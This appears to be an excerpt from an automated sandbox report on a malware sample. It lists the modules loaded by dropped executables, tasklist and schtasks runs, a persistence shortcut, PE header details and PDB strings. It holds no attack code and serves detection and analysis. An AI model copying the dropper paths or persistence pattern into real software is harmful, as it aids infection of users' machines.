                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: tdh.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: cabinet.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: wevtapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: duilib_u.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: msvcp140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: vcruntime140.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: dbghelp.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: pla.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: pdh.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: tdh.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: cabinet.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: wevtapi.dll
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: winhttp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: shfolder.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: riched20.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: usp10.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: msls31.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\expand.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: fswwa.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: d3d9.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: duilib_u.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: ybql.19.dr | LNK file: ..\..\..\..\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: mQRr8Rkorf.exe | Static file information: File size 5719552 > 1048576
Source: mQRr8Rkorf.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x56c000
Source: mQRr8Rkorf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: mQRr8Rkorf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: mQRr8Rkorf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: mQRr8Rkorf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: mQRr8Rkorf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: mQRr8Rkorf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: mQRr8Rkorf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: mQRr8Rkorf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wextract.pdb source: mQRr8Rkorf.exe, mQRr8Rkorf.exe, 00000000.00000000.872809030.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, A7B94.exe, A7B94.exe, 00000001.00000002.1214131092.0000000000921000.00000020.00000001.01000000.00000004.sdmp
Source: Binary string: E:\workdir\vc\rbin\RCClient\SplashWin.pdb,, source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1470296297.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000011.00000000.1459370608.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000012.00000002.1529025581.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp, SplashWin.exe, 00000012.00000000.1468327716.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: wextract.pdbGCTL source: mQRr8Rkorf.exe, 00000000.00000000.872809030.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, A7B94.exe, 00000001.00000002.1214131092.0000000000921000.00000020.00000001.01000000.00000004.sdmp
Source: Binary string: E:\workdir\ProgramDatabase\DuiLib_u.pdbww3 source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1476151236.000000006D715000.00000002.00000001.01000000.00000015.sdmp, SplashWin.exe, 00000012.00000002.1540319838.000000006C605000.00000002.00000001.01000000.00000019.sdmp, SplashWin.exe, 00000030.00000002.1939527563.000000006C915000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: ntdll.pdb source: HmngBpR.exe, 00000010.00000002.1535870954.0000000006930000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1514138504.0000000004D64000.00000004.00000020.00020000.00000000.sdmp
